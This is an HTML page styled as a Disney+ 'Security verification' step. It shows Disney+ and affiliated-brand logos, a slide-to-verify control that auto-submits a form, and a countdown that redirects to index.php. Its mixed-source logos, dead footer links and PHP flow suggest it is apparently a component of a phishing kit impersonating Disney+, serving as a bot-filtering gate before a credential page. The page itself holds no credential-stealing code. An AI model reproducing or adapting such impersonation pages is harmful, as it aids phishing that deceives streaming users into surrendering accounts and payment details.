<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Security verification | Disney+</title>
    <link rel="stylesheet" href="css/main.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        body {
            font-family: 'Plus Jakarta Sans', sans-serif;
            background-color: #040714;
            color: #ffffff;
            min-height: 100vh;
            margin: 0;
            padding: 0;
        }

        .animated-bg {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: -1;
            background: radial-gradient(circle at 50% 0%, rgba(26, 29, 41, 0.7), transparent 70%),
                        radial-gradient(circle at 50% 100%, rgba(23, 27, 41, 0.7), transparent 70%);
            opacity: 0.95;
            animation: bg-shift 30s ease infinite alternate;
        }

        @keyframes bg-shift {
            0% { background-position: 0% 0%; }
            100% { background-position: 10% 10%; }
        }

        .login-container {
            width: 100%;
            max-width: 480px;
            padding: 0 24px;
            margin: 0 auto;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        header {
            padding: 32px 0;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo img {
            max-width: 150px;
            height: auto;
        }

        .captcha-container {
            background-color: rgba(26, 29, 41, 0.9);
            backdrop-filter: blur(10px);
            border-radius: 16px;
            box-shadow: 0 8px 32px rgba(0, 0, 0, 0.3);
            overflow: hidden;
            border: 1px solid rgba(255, 255, 255, 0.1);
            padding: 30px;
            margin-top: 20px;
            text-align: center;
            margin-bottom: 40px;
        }
        
        .captcha-title {
            font-size: 24px;
            font-weight: 700;
            margin-bottom: 16px;
            color: white;
        }
        
        .captcha-subtitle {
            font-size: 15px;
            color: #b8c6d9;
            margin-bottom: 30px;
            line-height: 1.5;
        }
        
        .brand-logos {
            display: flex;
            justify-content: center;
            gap: 15px;
            margin: 25px 0;
            flex-wrap: wrap;
        }
        
        .brand-logo {
            height: 25px;
            max-width: 100%;
            object-fit: contain;
            opacity: 0.8;
            transition: opacity 0.3s ease;
        }
        
        .brand-logo:hover {
            opacity: 1;
        }
        
        .disney-characters, .disney-character {
            display: none;
        }
        
        .captcha-box {
            background-color: rgba(255, 255, 255, 0.05);
            border: 1px solid rgba(255, 255, 255, 0.1);
            border-radius: 12px;
            padding: 20px;
            margin-bottom: 20px;
            position: relative;
        }
        
        .captcha-code {
            font-size: 32px;
            letter-spacing: 5px;
            font-family: 'Courier New', monospace;
            font-weight: 700;
            margin-bottom: 15px;
            color: #0072ff;
            text-shadow: 0 0 5px rgba(0, 114, 255, 0.5);
        }
        
        .captcha-refresh {
            background: rgba(0, 114, 255, 0.2);
            border: none;
            border-radius: 50%;
            width: 36px;
            height: 36px;
            display: flex;
            align-items: center;
            justify-content: center;
            color: #0072ff;
            cursor: pointer;
            transition: all 0.3s ease;
            position: absolute;
            top: 15px;
            right: 15px;
        }
        
        .captcha-input {
            width: 100%;
            max-width: 300px;
            padding: 16px;
            background-color: rgba(255, 255, 255, 0.08);
            border: 1px solid rgba(255, 255, 255, 0.1);
            border-radius: 12px;
            color: white;
            font-size: 18px;
            text-align: center;
            letter-spacing: 3px;
            display: block;
            margin: 0 auto;
        }
        
        .captcha-input:focus {
            outline: none;
            border-color: #0072ff;
            box-shadow: 0 0 0 2px rgba(0, 114, 255, 0.2);
        }
        
        .captcha-info {
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 10px;
            margin-top: 20px;
            color: #b8c6d9;
            font-size: 14px;
        }
        
        .captcha-info i {
            color: #0072ff;
        }
        
        .error-message {
            color: #ff3860;
            margin: 15px auto;
            padding: 10px;
            background-color: rgba(255, 56, 96, 0.1);
            border-radius: 8px;
            max-width: 300px;
        }
        
        .btn-verify {
            background: linear-gradient(45deg, #0072ff, #00c6ff);
            color: white;
            border: none;
            border-radius: 8px;
            padding: 16px 32px;
            font-size: 16px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s ease;
            width: 100%;
            max-width: 300px;
            margin: 20px auto 10px;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 10px;
        }
        
        .captcha-timer {
            margin-top: 15px;
            text-align: center;
            font-size: 14px;
            color: #b8c6d9;
        }
        
        .timer-value {
            color: #0072ff;
            font-weight: bold;
        }

        footer {
            margin-top: auto;
            padding: 30px 0;
        }
        
        .footer-links {
            display: flex;
            justify-content: center;
            gap: 16px;
            margin-bottom: 16px;
            flex-wrap: wrap;
        }
        
        .footer-links a {
            color: #b8c6d9;
            text-decoration: none;
            font-size: 13px;
        }
        
        .copyright {
            text-align: center;
            color: #b8c6d9;
            font-size: 12px;
            opacity: 0.7;
        }

        @media (max-width: 480px) {
            .captcha-container {
                padding: 20px 15px;
            }
            
            .captcha-title {
                font-size: 20px;
            }
            
            .brand-logo {
                height: 20px;
            }
        }

        .slider-container {
            position: relative;
            background-color: rgba(255, 255, 255, 0.05);
            border: 1px solid rgba(255, 255, 255, 0.1);
            border-radius: 30px;
            padding: 0;
            margin: 30px 0;
            height: 50px;
            overflow: hidden;
        }
        
        .slider-track {
            position: absolute;
            width: 100%;
            height: 100%;
            background-color: rgba(255, 255, 255, 0.05);
        }
        
        .slider-progress {
            position: absolute;
            left: 0;
            top: 0;
            width: 0%;
            height: 100%;
            background: linear-gradient(90deg, rgba(0, 114, 255, 0.2), rgba(0, 198, 255, 0.3));
            transition: width 0.1s ease;
        }
        
        .slider-thumb {
            position: absolute;
            left: 0;
            top: 0;
            width: 50px;
            height: 50px;
            background: linear-gradient(45deg, #0072ff, #00c6ff);
            border-radius: 25px;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
            color: white;
            font-size: 18px;
            z-index: 10;
            transition: background 0.3s ease;
            touch-action: none;
            user-select: none;
        }
        
        .slider-thumb.active {
            background: linear-gradient(45deg, #0086ff, #00d0ff);
            box-shadow: 0 0 20px rgba(0, 114, 255, 0.5);
        }
        
        .slider-text {
            position: absolute;
            width: 100%;
            text-align: center;
            line-height: 50px;
            color: #b8c6d9;
            font-size: 16px;
            z-index: 5;
            pointer-events: none;
            user-select: none;
        }
        
        @keyframes success-pulse {
            0% { box-shadow: 0 0 0 0 rgba(0, 198, 255, 0.7); }
            70% { box-shadow: 0 0 0 15px rgba(0, 198, 255, 0); }
            100% { box-shadow: 0 0 0 0 rgba(0, 198, 255, 0); }
        }
        
        .slider-complete {
            animation: success-pulse 1.5s infinite;
        }
        
        .captcha-form .captcha-box,
        .captcha-input {
            display: none;
        }
    </style>
</head>
<body>
    <div class="animated-bg"></div>
    
    <div class="login-container">
        <header>
            <div class="logo">
                <img src="https://static-assets.bamgrid.com/product/disneyplus/images/logo.1a56f51c764022ee769c91d894d44326.svg" alt="Disney+" width="150">
            </div>
        </header>

        <div class="captcha-container">
            <h1 class="captcha-title">Security verification</h1>
            <p class="captcha-subtitle">To access Disney+, slide the bar to the end</p>
            
            <div class="brand-logos">
                <img src="https://cnbl-cdn.bamgrid.com/assets/7ecc8bcb60ad77193058d63e321bd21cbac2fc67281dbd9927676ea4a4c83594/original" alt="Disney" class="brand-logo">
                <img src="images/abc-logo.svg" alt="ABC" class="brand-logo">
                <img src="https://upload.wikimedia.org/wikipedia/commons/b/b9/Marvel_Logo.svg" alt="Marvel" class="brand-logo">
                <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/6/6c/Star_Wars_Logo.svg/1200px-Star_Wars_Logo.svg.png" alt="Star Wars" class="brand-logo">
                <img src="https://www.logo.wine/a/logo/Hulu/Hulu-Logo.wine.svg" alt="Hulu" class="brand-logo">
                <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Natgeologo.svg/1024px-Natgeologo.svg.png" alt="National Geographic" class="brand-logo">
                <img src="images/star-logo.svg" alt="Star" class="brand-logo">
            </div>
            
            <form method="post" action="" class="captcha-form" id="captcha-form">
                <input type="hidden" name="slider_complete" id="slider-complete-input" value="false">
                
                <div class="slider-container" id="slider-container">
                    <div class="slider-track"></div>
                    <div class="slider-progress" id="slider-progress"></div>
                    <div class="slider-text" id="slider-text">Slide to verify</div>
                    <div class="slider-thumb" id="slider-thumb">
                        <i class="fa-solid fa-arrow-right"></i>
                    </div>
                </div>
                
                <div class="captcha-info">
                    <i class="fa-solid fa-shield-halved"></i>
                    <span>This step protects our services against automated access</span>
                </div>
                
                <div class="captcha-timer">
                    Session expires in <span class="timer-value" id="countdown">120</span> seconds                </div>
            </form>
        </div>

        <footer>
            <div class="footer-links">
                <a href="#">Privacy</a>
                <a href="#">Terms of Use</a>
                <a href="#">Help</a>
                <a href="#">Compatible devices</a>
                <a href="#">About Disney+</a>
            </div>
            <div class="copyright">
                <p>© 2025 Disney and its affiliated companies. All rights reserved.</p>
            </div>
        </footer>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            let timeLeft = 120;
            const countdownElement = document.getElementById('countdown');
            
            function updateCountdown() {
                countdownElement.textContent = timeLeft;
                
                if (timeLeft <= 0) {
                    window.location.href = 'index.php';
                } else {
                    timeLeft--;
                    setTimeout(updateCountdown, 1000);
                }
            }
            
            updateCountdown();
            
            const sliderContainer = document.getElementById('slider-container');
            const sliderThumb = document.getElementById('slider-thumb');
            const sliderProgress = document.getElementById('slider-progress');
            const sliderText = document.getElementById('slider-text');
            const sliderCompleteInput = document.getElementById('slider-complete-input');
            const form = document.getElementById('captcha-form');
            
            let isDragging = false;
            let containerWidth = sliderContainer.offsetWidth;
            let thumbWidth = sliderThumb.offsetWidth;
            let maxTravel = containerWidth - thumbWidth;
            let startX = 0;
            let currentX = 0;
            
            const translations = {
                slide_verify: "Slide to verify",
                continue_slide: "Continue...",
                release_verify: "Release to verify",
                verified_success: "Successfully verified!"
            };
            
            function updateSliderPosition(posX) {
                posX = Math.max(0, Math.min(posX, maxTravel));
                
                sliderThumb.style.left = posX + 'px';
                
                const progressPercentage = (posX / maxTravel) * 100;
                sliderProgress.style.width = progressPercentage + '%';
                
                if (progressPercentage > 90) {
                    sliderText.textContent = translations.release_verify;
                } else if (progressPercentage > 10) {
                    sliderText.textContent = translations.continue_slide;
                }
                
                if (progressPercentage >= 100) {
                    completeSlider();
                }
                
                return posX;
            }
            
            function completeSlider() {
                sliderThumb.classList.add('slider-complete');
                sliderText.textContent = translations.verified_success;
                sliderCompleteInput.value = "true";
                sliderThumb.innerHTML = '<i class="fa-solid fa-check"></i>';
                
                setTimeout(() => {
                    form.submit();
                }, 500);
            }
            
            sliderThumb.addEventListener('mousedown', function(e) {
                isDragging = true;
                startX = e.clientX - sliderThumb.offsetLeft;
                sliderThumb.classList.add('active');
                
                e.preventDefault();
            });
            
            document.addEventListener('mousemove', function(e) {
                if (!isDragging) return;
                
                currentX = e.clientX - startX;
                currentX = updateSliderPosition(currentX);
            });
            
            document.addEventListener('mouseup', function() {
                if (!isDragging) return;
                
                isDragging = false;
                sliderThumb.classList.remove('active');
                
                if (currentX < maxTravel) {
                    sliderThumb.style.left = '0px';
                    sliderProgress.style.width = '0%';
                    sliderText.textContent = translations.slide_verify;
                }
            });
            
            sliderThumb.addEventListener('touchstart', function(e) {
                isDragging = true;
                startX = e.touches[0].clientX - sliderThumb.offsetLeft;
                sliderThumb.classList.add('active');
                e.preventDefault();
            });
            
            document.addEventListener('touchmove', function(e) {
                if (!isDragging) return;
                
                currentX = e.touches[0].clientX - startX;
                currentX = updateSliderPosition(currentX);
                e.preventDefault();
            });
            
            document.addEventListener('touchend', function() {
                if (!isDragging) return;
                
                isDragging = false;
                sliderThumb.classList.remove('active');
                
                if (currentX < maxTravel) {
                    sliderThumb.style.left = '0px';
                    sliderProgress.style.width = '0%';
                    sliderText.textContent = translations.slide_verify;
                }
            });
            
            window.addEventListener('resize', function() {
                containerWidth = sliderContainer.offsetWidth;
                thumbWidth = sliderThumb.offsetWidth;
                maxTravel = containerWidth - thumbWidth;
                
                sliderThumb.style.left = '0px';
                sliderProgress.style.width = '0%';
            });
        });
    </script>
</body>
</html>